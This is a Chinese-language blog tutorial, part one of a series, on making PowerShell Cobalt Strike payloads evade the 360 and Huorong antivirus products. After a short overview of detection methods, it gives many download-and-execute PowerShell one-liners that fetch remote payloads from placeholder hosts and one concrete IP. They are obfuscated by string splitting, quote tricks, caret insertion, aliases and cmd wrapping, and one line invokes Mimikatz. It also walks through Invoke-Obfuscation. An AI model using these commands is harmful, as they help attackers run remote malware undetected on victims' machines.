基础28-免杀基础之powershll过360、火绒上线(上)

gclome

原文链接:基础28-免杀基础之powershll过360、火绒上线(上)

​
内容目录
一.杀软简述比较常见的静态查杀方式比较常见的动态查杀方式
二、Powershell免杀(不落地式)
方法1:代码拆分变异
1.拆分组合
2.引号混淆
3.符号干扰方法
方法2:加密编码加混淆
一.杀软简述

比较常见的静态查杀方式
1.特征码识别
就像是WAF的黑名单一样，有hash、文件名、函数名、敏感字符串、敏感api这些信息在杀软病毒库中时，就会被判断为病毒软件。
2.校验和
根据正常文件的内容，计算其校验和，定期不定期的检查文件的校验是否与正常的校验和一样，其实本质还是特征码，万变不离其宗。
3.云查杀
云查杀的不同点在于它的病毒库是放在服务器端的，而不是本地客户端，意思是只要联网病毒库就会同步更新，这种病毒库更加强大,例如360的
4.启发式扫描
启发式则是将一类病毒总结后，归纳其特征，其后的演变都为一类病毒，这就是启发式算法,例如某文件小于100kb，且没有图标则可以识别为病毒，以此达到查杀病毒。
等等等……
比较常见的动态查杀方式
动态查杀指的是程序在运行的过程中执行了某些敏感操作，导致杀软查杀，例如添加管理员等，肯定会拦截。
1.流量特征
cs的通信协议是由RSA传输AES的密钥，AES的密钥加密后续通信，这也是c2的常规通信手法，但未经修改的profile 和证书，很容易被检测到。
2.内容特征：data字段是否存在命令相关的关键词加密特征（payload是否通讯加密，明文传输就会被查杀）
3.结构特征: 是否存在已知远控的通讯结构（cs中beacon有sleep）
4.IP : 是否被情报系统标记为恶意，微步等在线平台可查。
等等等……
二、Powershell免杀(不落地)

前提环境准备：CS、虚拟机安装最新版火绒和360卫士【注意：360卫士在测试时最好关闭云安全计划，不然很快就和谐。】

​

Powershell木马最常用的方式，一般都为远程下载然后执行的方法，特点就是：直接内存运行，无文件落地
原理：利用downloadstring远程读取powershell文件并iex执行
同时：powershell又分为无落地和落地两种。

落地式：

命令：powershell -ExecutionPolicy bypass -File  shell.ps1需要先上传powershell后门文件，再执行。

无落地式：
无需将恶意文件传到目标服务器/机器上，直接利用powershell的特性加载到内存执行，在任何可以执行命令的地方直接执行即可)：


命令：powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://xxx.xxx.xxx/a')"

????iex => Invoke-expression 将字符串当作powershell代码执行
????Set-Alias = > 给powershell函数以及变量赋予别称我们这里先直接生成一个powershell后门脚本

​

​

然后我们就可以将这个代码放到任意可以执行命令的地方进行上线即可。
当主机有杀软时，会直接拦截。

​

下面就用几个方法简单尝试绕过一下。
方法1:代码拆分变异
1.拆分组合(变量替代)
例如我们拆分前的命令为：

powershell.exe "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x/a'))”
假如这里的杀软对比的的关键词是http，那我们就可以进行简单拆分组合。
变成这样(利用两个变量拆分拼接)
powershell.exe "$a='IEX ((new-object net.webclient).downloadstring(''ht';$b='tp://x.x.x.x/a''));Invoke-Mimikatz;IEX ($a+$b)”
或者我们可以用replace来进行替换函数进行拆封，例如将downloadstring拆分两半在组合
powershell "$a='IEX(New-Object Net.WebClient).Downlo';$b='666(''http://x.x.x.x'')'.Replace('666','adString');IEX ($a+$b)"
2.引号混淆
混淆前的命令：

powershell.exe "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x/a’))”
混淆后的命令：

powershell.exe "IEX ((new-object net.webclient).downloadstring('ht‘+’tp://x.x.x.x/a’))”
3.符号干扰
在windows环境中，在执行命令时，有些字符的添加并不会影响命令的执行。
例如下面这些：
whoami //正常执行w"h"o"a"m"i //正常执行w"h"o"a"m"i" //正常执行wh""o^a^mi //正常执行wh""o^am"i //正常执行((((Wh^o^am""i))))//正常执行

​

这里要注意不可以连续加两个^,因为^是转义符，加两个后^后面的符号会被转义。
​​

​

我们也可以将这个加入到我们的powershell中达到干扰杀软的目的。
4.设置别名
设置前命令：

• 
  

powershell.exe "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x/a'))”
设置后命令：

• 
  

powershell set-alias -name cseroad -value Invoke-Expression;cseroad(New-Object Net.WebClient).DownloadString('http://xxx.xxx.xxx/a')
4.远程下载调用powershell

• 
  

这里利用echo执行
echo Invoke-Expression(new-object net.webclient).downloadstring('http://xxxxxxx/a') | powershell -5.cmd调用powershell
有些杀软对powershell查的比较严格，对cmd比较松，我们就可以利用cmd调用powershell达到简单绕过。
原命令

• 
  

echo Invoke-Expression(new-object net.webclient).downloadstring('http://xxxxxxx/a') | powershell -
修改后命令

• 
  

cmd.exe /c echo Invoke-Expression(new-object net.webclient).downloadstring('http://xxxxxxx/a') | powershell -
然后我们将这些方法做一个组合，就可以简单的绕过杀软上线。

​

当然，我们执行敏感命令的时候还是会查杀，这个就要使用其他办法绕过了。
方法2:加密编码加混淆
这里用到一个工具，海莲花组织的一个加密编码混淆工具，比较老了，好久没有更新了但还是可以用用的。
项目地址：

• 
  

https://github.com/danielbohannon/Invoke-Obfuscation
我们这里是将cs生成的powershell命令进行简单替换，也就是上面的步骤，然后再放入txt文件中，保存为ps1文件，然后执行时使用

• 
  

powershell -file xxx.ps1
相当于伪不落地的执行方式。
这里使用的命令是(原始命令)

• 
  

powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://42.192.152.182:8989/a')"
下载下来，使用powershell运行。
命令：

Import-Module ./Invoke-Obfuscation.psd1
Invoke-Obfuscation

​

​

然后输入你要使用的模块，本人英语不好，还是翻译一下。

​

这里我们就使用第三个混淆

​

然后再设置你要混淆的ps1文件的路径地址

​

最后选择混淆的方式，我这里选择的是2

​

这个就是混淆完成后的命令。
这里我们可以输入out 2.ps1，就会弹出刚刚混淆后的命令，我们就可以选择另存为了。

​

然后我们再将混淆后的代码进行一层编码,过程一模一样
​​​

然后设置路径，编码方式

​

​​​
然后我们就得到了混淆加加密的一个代码脚本,当然你也可以无限套娃，多来几次。
然后我们将其放到VT查杀看看。

​

因为只是静态查杀，所以过的比较多。当我们放入虚拟机执行时，发现直接gg。

​

360虽然静态扫描可以过掉，但是执行的时候，就会直接报毒，我们还是要用上面的一些其他办法优化一下原始脚本。下面是我前两天试的。

​

​

火绒已经是把这个工具的生成特征全部加入豪华大礼包了，不管你咋加密混淆都不行。后面还是会介绍其他工具的。

​

下篇写简单的powershll落地免杀~~~
  本人还是一个小白，所以有不对的地方希望各位海涵，有问题的话可以告诉我，绝对第一时间改正

​

。
​